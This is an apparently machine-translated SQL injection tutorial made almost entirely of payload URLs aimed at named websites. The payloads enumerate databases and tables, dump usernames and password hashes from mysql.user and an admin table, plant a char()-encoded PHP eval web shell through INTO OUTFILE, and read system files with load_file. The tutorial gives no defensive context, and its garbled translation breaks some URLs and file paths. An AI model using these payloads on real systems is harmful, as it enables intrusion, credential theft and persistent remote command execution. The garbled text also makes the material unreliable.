In order to facilitate the handwriting of An SQL. php injection point. If the classic id is not filtered, the SQL statement is inserted into the parameter for injection. You can import the database file test. SQL.
Injection Using the Information_schema system library and using the group_concat () function, group_concat () is powerful and can bypass limit restrictions.
Http://www.bkjia.com/ SQL .php? Id = 1 union select 0, 0, 0
The field is 3.
Http://www.bkjia.com/ SQL .php? Id = 1 and 1 = 2 union select count (*), 1, 1 from mysql. user
Count the number of users in the database
Http://www.bkjia.com/ SQL .php? Id = 1 and 1 = 2 union select 1, 2, group_concat (schema_name) from information_schema.schemata
During the test, only root or global permissions can be used to expose all common database users.
In this way, all the database names of the mysql server are displayed.
Http://www.bkjia.com/ SQL .php? Id = 1 and 1 = 2 union select 1, 2, group_concat (table_name) from information_schema.tables where table_schema = 0x74657374
This will display all the tables in the test database. 0x74657374 indicates the hex Value of test.
Http://www.bkjia.com/ SQL .php? Id = 1 and 1 = 2 union select 1, 2, group_concat (column_name) from information_schema.columns where table_name = 0x61646D696E
In this way, all the field names in the admin table are displayed.
The injection method is flexible. It broke the limit.
Let's see the injection Statement of pangolin.
Only root or global permissions are allowed for the following operations:
Select user from mysql. user
Http://www.bkjia.com/ SQL .php? Id = 1 and 1 = 2 union select concat (char (94), char (94), char (94), user, char (94), char (94 ), char (94), 1, 1 from (select * from mysql. user order by user limit 6, 1) t order by user desc) t limit 1 -- view the users in the database
Http://www.bkjia.com/ SQL .php? Id = 1 and 1 = 2 union select concat (char (94), char (94), char (94), password, char (94), char (94 ), char (94), 1, 1 from (select * from mysql. user order by user limit 6, 1) t order by user desc) t limit 1 -- view the password of the corresponding user
By constantly modifying limit 2, 1 to view all
Http://www.bkjia.com/ SQL .php? Id = 1 and 1 = 2 union select concat (char (94), char (94), char (94), password, char (94), char (94 ), char (94), 1, 1 from (select * from mysql. user order by user limit 2, 1) t order by user desc) t limit 1 --
Http://www.bkjia.com/ SQL .php? Id = 1 and 1 = 2 union select 1, username, password from admin limit 0, 10
Http://www.bkjia.com/ SQL .php? Id = 1 and 1 = 2 union select 1, username, password from admin limit 1,10
Http://www.bkjia.com/ SQL .php? Id = 1 and 1 = 2 union select 1, username, password from admin limit 2, 10
Retrieve records by using limit
You can also use the group_concat () function to display it at a time.
Http://www.bkjia.com/ SQL .php? Id = 1 and 1 = 2 union select 1, group_concat (username), group_concat (password) from admin
Note that the Application Path of into outfile is c:/2ww. php.
Http://www.bkjia.com/ SQL .php? Id = 1 and 1 = 2 union select concat (char (60), char (63), char (112), char (104), char (112 ), char (32), char (101), char (118), char (97), char (108), char (40), char (36), char (95 ), char (80), char (79), char (83), char (84), char (91), char (99), char (109), char (100 ), char (93), char (41), char (63), char (62), 1,1 into outfile c:/cm14dd. php
<? Php eval ($ _ POST [cmd])?> Asc code
Char (60), char (63), char (112), char (104), char (112), char (32), char (101), char (118 ), char (97), char (108), char (40), char (36), char (95), char (80), char (79), char (83 ), char (84), char (91), char (99), char (109), char (100), char (93), char (41), char (63 ), char (62)
Http://www.bkjia.com/ SQL .php? Id = 1 and 1 = 2 union select 1, <? Php eval ($ _ POST [cmd])?>, 3 into outfile c:/tt33.txt
Load_file Application
Http://www.bkjia.com// SQL .php? Id = 1 and 1 = 2 union select concat (char (94), char (94), char (94), load_file (0x633a5c626f6f742e696e69), char (94 ), char (94), char (94), 1, 1 --
0x633a5c626f6f742e696e69 is the hex Encoding of c: oot. ini.
Http://www.bkjia.com/ SQL .php? Id = 1 and 1 = 2 union select 1, 2, load_file (c:/boot. ini)
Http://www.nowpc.net/concrete.php? Id = 5% 20and % 201 = 2% 20 union % 20 select % ,,2, 3, 4, group_concat (schema_name) % 20 from % 20information_schema.schemata